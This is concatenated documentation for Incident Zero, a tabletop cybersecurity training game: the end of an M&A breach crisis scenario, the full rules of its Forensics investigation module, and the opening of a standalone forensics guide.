Special Events: - Turn 1: Breach discovered, acquirer learns in due diligence - Turn 2: Acquirer threatens to walk away (leverage) - Turn 3: Price renegotiation (acquirer lowers offer 10-20%) - Turn 4: Regulatory delay (FTC requests documents) - Turn 5: Deal extension negotiations (need more time for breach response) - Turn 6: Shareholder lawsuit (shareholders allege breach was hidden)

Team Decisions: 1. Full disclosure to acquirer (cooperation but deal value drops) 2. Minimal disclosure (preserve deal but fraud risk) 3. Separate negotiation: breach response vs. acquisition terms 4. Push for deal delay (to respond properly to breach)

Complex Incentives: - Company wants: - Deal to close at good price - Breach to be minimized - Acquirer to handle breach remediation - Acquirer wants: - Full disclosure of breach - Lower price to account for risk - Warranties that seller covers breach costs - Regulators want: - Full investigation - Breach remediation - Assurance of future security - May block if combined entity is too powerful

Cost Implications: - Breach response: Standard costs (+20-30 Budget) - Deal renegotiation: Millions in lost value - Regulatory review: Delays (may block deal) - Shareholder lawsuit: If breach was hidden, liability - Escrow/warranty: Seller may have to hold money as security

Communication Challenge: - Cannot disclose full breach details (acquirer has leverage) - Cannot hide breach (fraud risk) - Must negotiate simultaneously with acquirer + regulators + investigators - Media discovery complicates (stock price pressure)

Difficulty (v2.2): - Communication advances are halved (every statement is reviewed by two legal teams) - Board trust starts at 50% (deal-preservation pressure to under-respond) - Turn-3 Special Event: price renegotiation — Board trust -10 if Investigation is below 25% (the board can't answer the acquirer's questions)


Advanced Scenarios Summary

Scenario Challenge Difficulty Key Pressure
SCENARIO-01 Multi-Region Legal HIGH 3 different regulatory timelines
SCENARIO-02 Ransomware Extortion HIGH $10M decision + data publication threat
SCENARIO-03 Supply Chain Liability HIGH Vendor failure, customer trust
SCENARIO-04 Insider Threat HIGH Organizational trust collapse
SCENARIO-05 Critical Infrastructure EXTREME Lives at risk, government control
SCENARIO-06 Stock Crash HIGH Financial crisis + board pressure
SCENARIO-07 Triple Compromise EXTREME 3 simultaneous attacks, multiple ransoms
SCENARIO-08 M&A Complications EXTREME Deal value + regulatory blocks

Gameplay Recommendations

When to Use Advanced Scenarios

Use if: - Playing with experienced crisis management teams - Want sophisticated, realistic scenarios - Have time for complex decision-making (add 20-30 min per scenario) - Want to teach cascading effects of bad decisions

Skip if: - Playing with beginners (too complex) - Want simpler, faster gameplay - Limited time available - Focus is on learning basics

Scenario Selection Strategy

Start with easier scenarios: 1. SCENARIO-01 (Multi-Region): Complex but straightforward 2. SCENARIO-02 (Ransomware): Familiar from news, clear choices 3. SCENARIO-04 (Insider): Interesting organizational dynamics

Progress to harder scenarios: 4. SCENARIO-03 (Supply Chain): Adds liability complexity 5. SCENARIO-06 (Stock Crash): Financial crisis layer

Reserve for expert play: 6. SCENARIO-05 (Critical Infrastructure): Government involvement changes everything 7. SCENARIO-07 (Triple Compromise): Multiple simultaneous crises 8. SCENARIO-08 (M&A): Extreme complexity, conflicts of interest


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Use distinct coloring by complexity level:
  3. Orange (Advanced): SCENARIO-01 to SCENARIO-04
  4. Red (Advanced+): SCENARIO-05, SCENARIO-06
  5. Dark Red (Extreme): SCENARIO-07, SCENARIO-08
  6. Include warning icons (exclamation mark for extreme scenarios)
  7. Include difficulty rating on card
  8. Cut along dotted lines
  9. Create a "Scenario Difficulty Guide" for selecting appropriate scenarios

Possible Future Advanced Scenarios


Disaster Recovery Module: Advanced Crisis Scenarios (Expansion) Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

docs/rules/module-forensics.md

Forensics Module: Rules & Mechanics

Version: 2.2 - Playtest Edition (rule changes marked "(v2.2)"; see v2.2 Playtest Edition Changes) Last Updated: July 2026


Module Overview

The Forensics Module teaches incident investigation, digital forensics, and attack attribution. This module is typically entered after Incident Response or Disaster Recovery (representing the investigation phase of response) but can also be played standalone to teach forensic analysis concepts.

Rather than detecting the attack or managing the crisis, Forensics focuses on the crucial post-breach investigation phase: - Evidence collection and preservation - Timeline reconstruction of attacker actions - Attack chain analysis linking findings to MITRE ATT&CK techniques - Attribution and threat intelligence (who did this and how?) - Attack surface analysis (how did they get in?) - Lessons learned for future hardening and network building

Educational Purpose

Incident Response: Teaches proactive threat detection Hardening (typically after an IR win): Teaches proactive defense Disaster Recovery (typically after an IR loss): Teaches crisis management Forensics (after IR or DR): Teaches investigation and learning

Forensics can also be played standalone to teach forensic methodology without the preceding modules.


Module Purpose & Integration

When Forensics Occurs

In Campaign Play: 1. After Incident Response failure (undetected breach) → Forensics Phase 2. After Disaster Recovery (crisis management) → Forensics Phase 3. After Hardening success (discovered attack) → Optional Forensics for deeper learning

In Standalone Play: - Forensics module can be played independently as a 45-90 minute investigation scenario

Forensics Feeds Into Other Modules

Outputs from Forensics: - Attack Chain Reconstruction: Detailed understanding of how attacker progressed - Vulnerability Discovery: Systems and methods exploited - Threat Intelligence: IOCs (Indicators of Compromise), malware samples, attacker infrastructure - Timeline Evidence: When each compromise occurred

Used In: - Hardening Module: "Build defenses against the techniques discovered in forensics" - Network Building Module: "Redesign network architecture knowing how attacker pivoted" - Audit & Compliance Module: "Assess coverage of controls that should have detected forensic findings"


Forensics Module Setup

Prerequisites for Forensics Phase

Trigger Options:

  1. Sequential (After IR/DR): Team completed Incident Response or Disaster Recovery
  2. Card descriptions reveal attack chain that was discovered or undetected
  3. Blue Team now investigates for attribution and deeper understanding

  4. Standalone Setup: Team starts fresh investigation (no prior IR/DR)

  5. Threat Orchestrator secretly selects 1-2 complete attack chains
  6. Blue Team investigates to discover and reconstruct the attack

Discovery & Revelation (Sequential Play)

When entering Forensics after IR or DR, the Threat Orchestrator reveals the attack context:

Example (After IR Success): "Your security team detected and contained an attack chain: 1. Phishing email (SOCIAL ENGINEERING) 2. Credential harvesting malware (MALWARE) 3. Lateral movement to admin account (CREDENTIAL ABUSE)

Now you investigate to understand: How deep did they get? Are there other persistence mechanisms? Can we attribute this to a known threat group?"

Example (After DR/IR Failure): "Forensic examination of compromised systems reveals: 1. Initial access via credential stuffing (CREDENTIAL ABUSE) 2. Privilege escalation via unpatched service (WEB EXPLOIT) 3. Persistence through scheduled task modification (MALWARE) 4. Data exfiltration via DNS tunneling (DATA EXFIL)

Now you reconstruct the complete timeline and attribute the attack."


Forensics Module Components

Card Types Specific to Forensics

Investigation Action Cards (12 cards)

These represent forensic investigation techniques and evidence collection methods.

Standard Investigation Actions:

Card Technique DC Cost Time Result
DISK-01 Disk Image & Analysis 12 10 2 turns Recover deleted files, malware samples
DISK-02 File System Carving 14 15 3 turns Deep file recovery, hidden artifacts
MEM-01 Memory Dump & Analysis 13 15 2 turns Volatile process info, injected code
MEM-02 Memory Forensics Deep Dive 15 20 3 turns Malware behavior, command-and-control
LOG-01 Event Log Analysis 11 5 1 turn Timeline of user actions, logins
LOG-02 Deep Log Correlation 13 10 2 turns Cross-system timeline, attack sequence
NET-01 Network Traffic Analysis 12 10 2 turns Exfiltration evidence, C2 communications
NET-02 Packet Capture Deep Analysis 14 15 3 turns Protocol-level forensics, attacker tools
MALW-01 Malware Analysis (Dynamic) 12 15 2 turns Behavior analysis, IOCs
MALW-02 Malware Analysis (Static) 14 10 2 turns Code reverse engineering, capabilities
TIMELINE-01 Timeline Reconstruction 13 5 1 turn Chronological attack sequence
THREAT-01 Threat Attribution Analysis 15 20 3 turns Link to known groups, TTPs

DISK-01 rush option (v2.2): pay +5 Budget (15 total) to run it at Duration 1.

Investigation Action Card Structure: - Title: e.g., "Disk Image & Analysis" - Technique: MITRE ATT&CK reference (e.g., "Forensic Analysis") - Difficulty Class (DC): Roll d20+modifiers vs. this number to succeed - Cost: Budget required to perform investigation - Duration: Number of turns this investigation takes - What It Reveals: Type of evidence discovered (see Evidence Cards below) - Success Condition: d20+forensics_skill vs. DC (11+ usually succeeds, but higher DC cards reward skilled investigators)

Investigation Duration (v2.2): Starting an investigation with Duration N occupies your action on the turn you start it (pay the Budget cost then). Count the turn you start it as turn 1: the results (evidence + meter advances) arrive — and the roll is made — at the START of turn N. So Duration 1 resolves immediately on the same turn; Duration 2 resolves at the start of the following turn; Duration 3 resolves two turns after starting. Only ONE multi-turn (Duration 2+) investigation may be in flight at a time, but you may take other actions (Analyze Evidence, Follow Lead, or a Duration 1 investigation) while waiting.


Evidence Cards (12 cards)

These represent specific findings from investigations. They document what was discovered and provide investigative leads.

Categories of Evidence (core deck counts):

A. Malware & Persistence (4 cards: EVD-01, EVD-03, EVD-08, EVD-10) - Trojan samples with capabilities (spyware, RAT, backdoor) - Persistence mechanisms (scheduled tasks, registry modifications, startup folders) - Encryption keys recovered from malware or memory - Malware behavior profiles from sandbox analysis

B. Credentials & Access (1 card: EVD-04) - Admin account compromise timeline - Suspicious logins from unusual times, locations, or sources

C. Lateral Movement (1 card: EVD-05) - Pass-the-hash evidence - Tools used for pivoting - Systems accessed with each credential

D. Exfiltration (1 card: EVD-06) - Volume of data exfiltrated - File types extracted - Destination IP addresses or domains - Timing of exfiltration windows

E. Attack Infrastructure (2 cards: EVD-02, EVD-07) - Command-and-control servers - Malware staging servers - Registrar information (domain registration) - ASN and geolocation data

F. Attack Activity (3 cards: EVD-09, EVD-11, EVD-12) - Attacker command history - File staging artifacts (what was collected before exfiltration) - Anti-forensics evidence (log deletion, timestamp manipulation)

Evidence Card Structure: - Title: Specific finding (e.g., "Credential Dumper Malware") - Type: Category (Malware, Persistence, Credentials, Movement, Exfiltration, Infrastructure, Timeline) - MITRE ATT&CK Technique: Referenced technique (e.g., T1003 - OS Credential Dumping) - Description: What was found and where - Investigation Source: Which Investigation Action card led to this - Investigative Lead: What the Blue Team can do with this information - Connection to Attack Chain: Links back to specific Threat cards from IR phase (if sequential)


Findings Cards (4 cards)

These represent the conclusions of the forensic investigation and feed into recommendations.

Finding Types:

Finding Description Feeds Into Module
FIND-01: Threat Attribution Report Identified attacker group, techniques, motivations Hardening, Audit & Compliance (threat model), Incident Response
FIND-02: Attack Surface Analysis Systems/methods exploited; entry points identified Network Building, Hardening, Audit
FIND-03: Persistence Mechanisms Discovered How attacker maintained access; backdoors identified Hardening (remove persistence), Disaster Recovery, Audit
FIND-04: Investigative Gaps & Recommendations Questions answered vs. remaining; next steps Audit & Compliance (post-incident review), Training

Game Materials Required (Forensics-Specific)

Physical Components: - Investigation Action cards (12 cards) - Evidence cards (12 cards) - Findings cards (4 cards) - Turn Tracker (8-15 turns typical) - Budget Tracker (Investigation budget: 0-100) - Progress Meters (see below): - Timeline Completeness (0-100%) - Attack Chain Reconstruction (0-100%) - Attribution Confidence (0-100%) - Evidence Chain of Custody (0-100%)

Optional: - Investigation Flow Chart (showing how actions lead to evidence discovery) - MITRE ATT&CK Technique reference sheet - Evidence correlation board (physical board or spreadsheet linking evidence)


Forensics Module Mechanics

Game Length & Difficulty

Turn Structure: - Easy (TIER 1): 6-8 turns | Simple attack, few pivot points, obvious artifacts - Medium (TIER 2): 8-10 turns | Standard breach with some obfuscation - Hard (TIER 3): 11-13 turns | Complex attack, sophisticated attacker, limited logging - Expert (TIER 4): 14-15 turns | APT-level sophistication, anti-forensics measures, encrypted communications

Turn Length Determination: Using the Variable Turn Length System (see Core Rules): 1. Threat Orchestrator selects attack complexity tier 2. Roll d4 for variation (-1, 0, 0, +1) 3. Announce final turn count to Blue Team

Investigation Budget: - Starting Budget: 75 (represents forensic lab time, tools, personnel) - Optional Bonus: +25 if company has cyber insurance or threat intelligence subscription - Budget Tracker Range (v2.2): 0-100 (75 base + 25 optional bonus is the maximum starting value)


Action System

Each turn, the Blue Team performs ONE of these actions:

Action A: Conduct Investigation 🔍

Description: The team describes a specific forensic investigation they want to perform.

Mechanics: 1. Choose Investigation Card: Select from available Investigation Action cards (Disk, Memory, Logs, Network, Malware, Timeline, or Attribution) 2. Pay Cost: Spend Budget equal to card cost (paid on the turn you start the investigation) 3. Resolve Duration (v2.2): If Duration is 2+, the roll and results wait until the START of the turn the investigation completes (see Investigation Duration rule above) 4. Roll: d20 + relevant skill modifier vs. Difficulty Class on card - Modifiers: - +2 if team has forensics background - +1 if prior Investigation Action revealed clues to this technique - +1 if team provides detailed narrative explanation of investigation approach - -2 if investigation is being done hastily (using extra turn pressure to rush) 5. Check Results: - Success (roll ≥ DC): Discover ONE Evidence card — unless the card says otherwise (v2.2: MEM-02 and NET-02 award TWO) — and apply that Evidence card's printed meter impacts (see No Double Counting, Rule 5) - Partial Success (roll DC-2 to DC-1): Discover PARTIAL Evidence (partial timeline, hints of compromise, etc.) and apply the investigation card's partial-success advance line - Failure (roll < DC-2): No Evidence discovered this turn; Budget still spent

Progress Meter Advancement: Each successful Investigation Action advances one or more Progress Meters. Typical advances are +5-35% per meter (major breakthroughs can exceed +20%): - Timeline Completeness (+5-35%): Evidence that establishes temporal sequence - Attack Chain Reconstruction (+5-35%): Evidence linking attacker actions together - Attribution Confidence (+5-35%): Evidence pointing to threat actor identity - Evidence Chain of Custody: advances via the Chain of Custody rule (v2.2, Rule 1) and the printed impacts on some Evidence cards

Example Investigation:

Blue Team: "We want to conduct a disk image and analysis of the compromised server." Cost: 10 Budget (paid now). DISK-01 has Duration 2, so the team's action this turn is starting the imaging; results arrive at the start of the next turn. DC: 12 Blue Team Roll (at the start of the next turn): d20 + 2 (forensics background) = 15 Result: Success! Discover evidence card EVD-01 "Credential Dumper Malware" and apply its printed impacts: Attack Chain +15%, Attribution +10%, Timeline +10%. The team states the binary was hashed (SHA-256) before analysis: Chain of Custody +5% (v2.2)


Action B: Analyze Existing Evidence 📊

Description: The team reviews evidence cards already discovered and makes connections.

Cost (v2.2): 5 Budget. Each Evidence card can be Analyzed only once (v2.2) — mark cards as Analyzed when they are included in this action.

Mechanics: 1. Pay Cost: Spend 5 Budget (v2.2) 2. Review Evidence: Team looks at 2-4 not-yet-Analyzed Evidence cards already discovered 3. Make Connection: Team describes how findings are related (temporal, technical, or attribution-based) 4. Roll: d20 + relevant skill vs. DC 10 - Modifiers: - +2 if team connects 3+ evidence cards in coherent narrative - +1 if connection references specific MITRE ATT&CK technique 5. Check Results: - Success (roll ≥ 10): Gain insight; advance two Progress Meters by 5-10% each - Failure (roll < 10): No progress; action still costs a turn (represents time spent on dead-end analysis)

Example Analysis:

Blue Team: "The malware sample found in memory matches the persistence mechanism in the scheduled task, suggesting the attacker uploaded the same tool twice. This indicates they knew what they were doing and weren't just randomly exploring." Roll: d20 + 2 (good narrative) = 16 Result: Success! +10% Attribution Confidence (skilled attacker), +10% Attack Chain Reconstruction (coordinated multi-stage attack)


Action C: Follow Investigative Lead 🔗

Description: Based on existing evidence, the team pursues a specific investigative thread.

Cost (v2.2): 5 Budget (printed cost for every Follow Investigative Lead action).

Mechanics: 1. Pay Cost: Spend 5 Budget (v2.2) 2. Choose Evidence Card: Pick an Evidence card with an "Investigative Lead" 3. Describe Approach: How will the team pursue this lead? (e.g., "Track the C2 domain to registrar records to find other registered domains") 4. Roll: d20 + relevant skill vs. DC (varies 11-14 depending on lead) 5. Check Results: - Success: Discover a new Evidence card directly related to the lead and apply its printed meter impacts (v2.2: if no suitable undiscovered Evidence card exists, advance Attribution Confidence +20% instead — never both) - Partial Success: Discover related evidence but get a false lead (discover 1 Evidence + 1 Red Herring card) - Failure: Dead-end lead; use turn without discovering evidence

Example Lead:

Evidence Card: "Command-and-Control Communications (IP: 203.0.113.45)" Investigative Lead: "Perform ASN and WHOIS lookup to find other infrastructure operated by this attacker" Blue Team: "Let's trace the IP's ASN and registrar records to find other malicious domains." Cost: 5 Budget (v2.2) Roll: d20 + 1 (good idea) = 14 vs. DC 12 Result: Success! Discover EVD-07 "Attacker Infrastructure Map" and apply its printed impacts: Attribution +30%, Attack Chain +15%, Timeline +10%. Team documents WHOIS/passive-DNS exports: Chain of Custody +5% (v2.2)


Victory & Failure Conditions

Investigation Complete (Victory)

The Blue Team achieves ONE of these:

Victory Condition 1: "Full Attribution" - Attribution Confidence ≥ 90% AND Timeline Completeness ≥ 80% - Outcome: "Your investigation successfully attributes this attack to [Known Threat Group]. Security intelligence briefing prepared."

Victory Condition 2: "Solid Case" - Timeline Completeness ≥ 80% AND Attack Chain Reconstruction ≥ 80% AND Evidence Chain of Custody ≥ 70% - Outcome: "Your forensic report is publishable quality and defensible in court. Law enforcement briefed."

Victory Condition 3: "Partial Findings" - Any two Progress Meters ≥ 70% at game end - Outcome: "Investigation concluded. Findings are actionable for hardening and threat intelligence."

Investigation Inconclusive (Failure)

Precedence (v2.2): - Victory conditions are always checked FIRST. The old "any meter < 40% = failure" clause is DELETED (it conflicted with Victory Condition 3): a low meter never overrides a met victory condition. - Budget exhaustion is NOT a loss. The game continues to the turn limit: you may always take the cheap 5-Budget actions (Analyze Existing Evidence, Follow Investigative Lead, LOG-01, TIMELINE-01) while Budget lasts, and even at 0 Budget the team keeps playing (narrating connections, re-checking victory at game end). Victory conditions are still checked normally.

Penalty for Inconclusive Investigation: - Cannot feed findings into Hardening or Network Building modules - Audit & Compliance module must assess with incomplete information - Reduced confidence in future threat intelligence


Special Forensics Rules

Rule 1: Chain of Custody Tracking

Every Evidence card must be documented to maintain admissibility in legal proceedings.

Earning Chain of Custody (v2.2): +5% Chain of Custody every time an Evidence card is discovered AND the team states how it was preserved (hash, imaging, log export); the TO may award +10% for exemplary handling. This is in addition to any Chain of Custody impact printed on the Evidence card itself.

How It Works: - When an Evidence card is discovered, mark how it was obtained (which Investigation Action) and state how it was preserved - If chain of custody is broken (evidence obtained illegally or improperly), it becomes inadmissible - Inadmissible evidence cannot be used for Attribution or Timeline building - Cost to fix broken chain: 5 Budget + 1 turn to re-document evidence

Example:

Evidence "Admin Credentials Exfiltrated" discovered via "Memory Dump Analysis" (legal). Chain of custody: intact. Can be used in court. But if same evidence discovered via "Unauthorized System Access" by Blue Team (illegal), chain is broken and evidence is inadmissible.


Rule 2: Anti-Forensics Techniques

More sophisticated attacks may include anti-forensics measures that complicate investigation.

Anti-Forensics Examples: - Log deletion or manipulation - Encrypted communication channels - Malware that overwrites disk sectors - Timeline obfuscation (backdated files, timezone manipulation)

How It Works: - Threat Orchestrator can note that certain Investigation Actions are harder due to anti-forensics - Affected Investigation Cards gain +2 DC penalty if anti-forensics present - Example: "Evidence logs were deleted. Log Analysis (DC 11) now has DC 13."

Overcoming Anti-Forensics: - Investigators can use advanced techniques (Memory Forensics, Network Traffic Analysis) that bypass deleted logs - Alternatively, combine multiple Investigation Actions to corroborate timeline from different sources - Example: "Timeline can't be built from deleted logs, but network traffic shows exfiltration at 2:15 AM, and memory analysis shows C2 connection at 2:10 AM. We can reconstruct it."


Rule 3: Attacker Dwell Time

Represents how long the attacker remained in the network before detection or expulsion.

Mechanics (v2.2): - If the scenario states the attacker dwelled undetected 3+ turns (or the preceding Incident Response module ran 10+ turns), apply +1 DC to DISK and LOG investigations (evidence degraded). - Longer dwell time = more data exfiltrated, more persistence mechanisms installed, harder to attribute - But longer dwell also = more evidence: the TO may make 1-2 additional Evidence cards discoverable (more actions, more forensic artifacts)

Example:

Scenario states the attacker dwelled undetected for 4 turns before the investigation began. DISK-01, DISK-02, LOG-01, and LOG-02 all have +1 DC (evidence degraded over time). But the Blue Team can discover more Evidence cards (+2 cards total) due to the attacker's extended activity.


Rule 4: Incomplete Evidence

Some investigations may yield partial or fragmentary evidence that requires interpretation.

How It Works: - Partial success on Investigation roll = discover Evidence card marked "INCOMPLETE" - INCOMPLETE Evidence provides +1 Progress Meter advance but is NOT admissible alone for conclusions - Team can retry investigation next turn to complete the evidence (costs full Budget again) - Or team can interpret incomplete evidence by rolling d20+investigator skill vs. DC 12 - Success: Use incomplete evidence as-is (risky but saves Budget) - Failure: Incomplete evidence leads to false conclusion (Red Herring card added)


Rule 5: No Double Counting (v2.2)

Investigation cards list meter advances AND discovered Evidence cards list their own meter impacts. Never apply both.

How It Works: - When an investigation discovers an Evidence card, apply ONLY the Evidence card's printed meter impacts. - The investigation card's own "Advance" line applies only when no Evidence card is produced — e.g., a partial success that yields fragments, or a success when no suitable undiscovered Evidence card remains. - The +5% Chain of Custody handling bonus (Rule 1, v2.2) still applies on top of the Evidence card's printed impacts — it rewards documentation, not discovery.


Forensics Skill Modifiers

Base Skill Modifiers (apply to all Investigation rolls):

Background Modifier Example
Forensic Analyst or Incident Responder +2 Person with formal training
IT Security or System Administrator +1 Technical background but not formal IR training
General IT +0 Basic tech knowledge
Non-Technical -2 No technical background
Forensics Researcher (GIAC GCFE, etc.) +3 Expert-level investigator

Situational Modifiers: - +1: Detailed narrative explanation of investigation methodology - +2: Team describes investigation approach that references MITRE ATT&CK framework - +1: Prior Investigation Action discovered clues to current investigation - -2 (v2.2): Using hastily (team taking Forensics as last-ditch effort in final turn) - -2: Investigation approach is technically unsound or unrealistic


Forensics Module Standalone Setup

When playing Forensics as a standalone game (without prior IR/DR):

Setup Steps

  1. Threat Orchestrator Preparation (Secret):
  2. Select attack scenario complexity (TIER 1-4)
  3. Roll d4 for turn variation (-1, 0, 0, +1)
  4. Secretly choose 3-5 Threat cards from core deck or expansions
  5. Arrange threat cards in logical attack progression
  6. Note which investigation techniques would discover each threat

  7. Blue Team Briefing:

    "You've been called to investigate a data breach discovered during routine system maintenance. Initial assessment: - Critical database server accessed 2 weeks ago - 5 million customer records potentially compromised - Attacker origin and motivations unknown - You have [TURN COUNT] turns to reconstruct the attack and find attribution clues. - Starting Budget: 75 (or 100 for well-funded incident response team)"

  8. Available Actions:

  9. Conduct Investigation (as normal)
  10. Analyze Existing Evidence
  11. Follow Investigative Leads

  12. Victory Conditions (v2.2):

  13. Identical to campaign play — use the three canonical conditions in Victory & Failure Conditions:
    • V1 "Full Attribution": Attribution ≥90% AND Timeline ≥80%
    • V2 "Solid Case": Timeline ≥80% AND Attack Chain ≥80% AND Chain of Custody ≥70%
    • V3 "Partial Findings": any two meters ≥70% at game end

Module Combinations with Forensics

Recommended Sequences

Sequence 1: Detect & Investigate (90 minutes) - Incident Response (45 min) - Detect attack chain - Forensics (45 min) - Investigate and attribute

Sequence 2: Failure & Investigation (120 minutes) - Incident Response (45 min) - Fail to detect all threats - Disaster Recovery (45 min) - Manage breach crisis - Forensics (30 min) - Investigate for lessons learned

Sequence 3: Complete Lifecycle (180+ minutes) - Network Building (45 min) - Design initial network - Hardening (45 min) - Build defenses - Incident Response (45 min) - Test defenses - Disaster Recovery (45 min) - Handle failure - Forensics (30 min) - Investigate findings - Audit & Compliance (30 min) - Assess overall security posture


Debrief & Learning Outcomes

Post-Game Discussion Questions

After Forensics concludes, facilitate discussion around these questions:

Investigation Process: 1. What investigation techniques were most revealing? Why? 2. What evidence was most critical to understanding the attack? 3. What was the attacker's most sophisticated technique? What made it hard to detect forensically? 4. How would the investigation have been different with better logging? Better endpoint tools?

Attribution & Intelligence: 1. What threat actor profile emerged? What's their likely motivation? 2. What geographic or geopolitical clues do you see in the evidence? 3. How would you share this intelligence with law enforcement or information sharing communities?

Hardening & Prevention: 1. Based on forensic findings, what specific defenses would prevent this attack? 2. How would you network design need to change to limit lateral movement? 3. What logging and monitoring would have caught this earlier?

Real-World Connection: 1. How does this scenario compare to actual breaches you've studied? (VERIZON DBIR, Microsoft Security Incidents, etc.) 2. What's the typical cost of forensic investigation in real incidents? 3. How does attribution accuracy impact threat intelligence and policy response?


Technical Details & Implementation Notes

MITRE ATT&CK Integration

Each Investigation Action card and Evidence card should reference specific MITRE ATT&CK techniques/procedures:

Investigation Actions → Techniques Discovered: - Disk Forensics → T1005 (Data from Local System), T1025 (Data from Removable Media) - Memory Forensics → T1112 (Modify Registry), T1055 (Process Injection) - Log Analysis → T1071 (Application Layer Protocol), T1090 (Proxy) - Network Analysis → T1041 (Exfiltration Over C2 Channel), T1048 (Exfiltration Over Alternative Protocol) - Malware Analysis → T1104 (Multi-Stage Channels), T1059 (Command and Scripting Interpreter) - Timeline Reconstruction → T1074 (Data Staged), T1003 (OS Credential Dumping) - Attribution → G#### group / S#### software identification (threat attribution)

Forensics Difficulty Scaling

TIER 1 (6-8 turns): Unsophisticated attacker, plenty of artifacts, obvious malware - Low DC (10-12) Investigation Actions - Evidence cards plentiful and obvious - Chain of custody intact - No anti-forensics measures - Example: Script kiddie using public exploits, little cleanup

TIER 2 (8-10 turns): Standard attacker, some cleanup, moderate sophistication - Medium DC (12-14) Investigation Actions - Evidence cards present but require analysis - Some chain of custody concerns - Basic anti-forensics (log deletion) - Example: Credential theft ring, lateral movement, data exfil

TIER 3 (11-13 turns): Sophisticated attacker, significant obfuscation - High DC (13-15) Investigation Actions - Evidence requires correlation across multiple sources - Chain of custody significant challenge - Advanced anti-forensics (encryption, timeline spoofing) - Example: APT group with operational security discipline

TIER 4 (14-15 turns): Nation-state or elite attackers, expert anti-forensics - Very high DC (14-16+) Investigation Actions - Evidence heavily fragmented and incomplete - Chain of custody nearly impossible to prove - Sophisticated anti-forensics and counter-attribution - Example: State-sponsored APT with deep technical expertise


Printable Card Templates

See cards/forensics/core-deck/investigation-cards.md for printable Investigation Action cards.

See cards/forensics/core-deck/evidence-cards.md for printable Evidence and Findings cards.


Version History


Quick Reference

Setup: Select complexity tier, roll d4, announce turn count Actions: Conduct Investigation (card cost, Duration 1-3 turns), Analyze Evidence (5 Budget, each Evidence card only once), Follow Leads (5 Budget) Rolls: d20 vs. DC, with skill modifiers; partial success on DC-2 to DC-1 Durations (v2.2): Duration N resolves at the start of turn N, counting the starting turn as turn 1 (Duration 1 = immediate); only one multi-turn investigation in flight at a time Resources: Budget (75 base, tracker 0-100), Turns (6-15), Progress Meters (4 tracked) Victory (v2.2): - V1 "Full Attribution": Attribution ≥90% AND Timeline ≥80% - V2 "Solid Case": Timeline ≥80% AND Attack Chain ≥80% AND Chain of Custody ≥70% - V3 "Partial Findings": any two meters ≥70% at game end Failure (v2.2): At the turn limit, no victory condition met. Victory conditions are checked first; there is no meter-minimum failure clause and budget exhaustion is not a loss.


v2.2 Playtest Edition Changes

  1. Canonical victory conditions. Four conflicting versions of the "complete case" condition (plus a fifth standalone-only condition) are replaced by one canonical set, stated identically here, in the Quick Reference, and in the standalone guide:
  2. V1 "Full Attribution": Attribution ≥90% AND Timeline ≥80%
  3. V2 "Solid Case": Timeline ≥80% AND Attack Chain ≥80% AND Chain of Custody ≥70%
  4. V3 "Partial Findings": any two meters ≥70% at game end
  5. Failure: at the turn limit, no victory condition met
  6. Precedence: victory conditions are checked first. The "any meter <40% = failure" clause is deleted (it conflicted with V3). Budget exhaustion is not a loss. Meter "averages" are never used anywhere.
  7. Investigation Duration is now a real rule. Starting a Duration-N investigation occupies your action and Budget on the starting turn; results arrive at the start of turn N (counting the starting turn as turn 1) — Duration 1 resolves immediately. Only one multi-turn investigation in flight at a time. DISK-01's rush option is priced: pay +5 Budget to run it at Duration 1.
  8. Chain of Custody is earnable: +5% every time an Evidence card is discovered AND the team states how it was preserved (hash, imaging, log export); TO may award +10% for exemplary handling.
  9. Reachability math: printed CoC impacts on Evidence cards total +50% (EVD-08 +15, EVD-09 +10, EVD-10 +10, EVD-11 +10, EVD-12 +5). In a typical 8-10 turn game the team discovers 6-8 Evidence cards: 7 discoveries with stated preservation = +35% handling; if those include EVD-08, EVD-09, and EVD-11 that adds +35% printed, for 70% — the V2 threshold — without any exemplary awards. Exemplary handling (+10 instead of +5) or additional CoC-bearing cards push it higher. Under v2.1's printed-only gains, the ceiling was ~60% and V2 was mathematically unreachable.
  10. Analyze Existing Evidence costs 5 Budget, and each Evidence card can be Analyzed only once (it was a free, infinitely repeatable dominant action).
  11. Follow Investigative Lead has a printed cost: 5 Budget (examples previously charged 10 or 0).
  12. No Double Counting (Rule 5): when an investigation discovers an Evidence card, apply ONLY the Evidence card's printed meter impacts; the investigation card's advance line applies only when no Evidence card is produced (e.g., partial success).
  13. Partial-success band is DC-2 to DC-1 (matches all printed cards; the module previously said DC-3 to DC-1).
  14. Meter advance range widened to +5-35% — major breakthroughs can exceed +20% (cards already went to +35).
  15. One-Evidence rule now reads "unless the card says otherwise" (MEM-02 and NET-02 award two Evidence cards).
  16. Haste modifier is -2 everywhere (was -1 in one list). Anti-forensics example corrected to DC 13 (11 + 2). Dwell time redefined in turns: attacker dwelled undetected 3+ turns (or IR module ran 10+ turns) → +1 DC to DISK and LOG investigations.
  17. MITRE ATT&CK corrections across the module and card files (~12 wrong ID/name pairs fixed: T1005, T1074, T1112, T1040, T1055, T1059.001, T1556, T1027, and removal of irrelevant T1120/T1113/T1004 mappings).
  18. Credential and path errata: DISK-01 GCIH/GCFE (was CCNA-Security), MALW-01 GREM (was fictional "CRT"), EVD-10 registry path now includes \CurrentVersion.
  19. Budget tracker range is 0-100 (was "maximum useful 150"). Starting budget stays 75 (+25 optional).
  20. Deck summaries recounted from the actual cards: 12 Investigation, 12 Evidence, 4 Findings; evidence-type counts and the investigation→evidence flow map regenerated from the cards' Discovery Sources.

docs/standalone-games/forensics.md

Forensics Module: Standalone Game Guide

Version: 2.2 - Playtest Edition (rule changes marked "(v2.2)" — see the module rules doc for the full change list) Duration: 45-90 minutes Player Count: 1 Threat Orchestrator + 1-4 Investigators Complexity: Intermediate to Advanced


Overview

This guide explains how to play the Forensics Module as a standalone game, without needing to have played Incident Response, Hardening, or Disaster Recovery first.

In standalone Forensics, you are a team of incident investigators called in to analyze a data breach. Your goal is to reconstruct the attack, discover the attacker's techniques, and if possible, attribute the breach to a known threat actor. This is a "detective" game focused on piecing together evidence rather than detecting or preventing attacks.


What You'll Learn


Game Components

Required Components

Optional Enhancements


Setup Instructions

Step 1: Choose Difficulty Tier

The Threat Orchestrator (game facilitator) selects an attack complexity tier. Do NOT tell the Blue Team the tier—it's secret.

Tier Turn Count Attack Type Example
TIER 1 (Beginner) 6-8 Script kiddie, basic malware Casual cybercriminal, obvious techniques
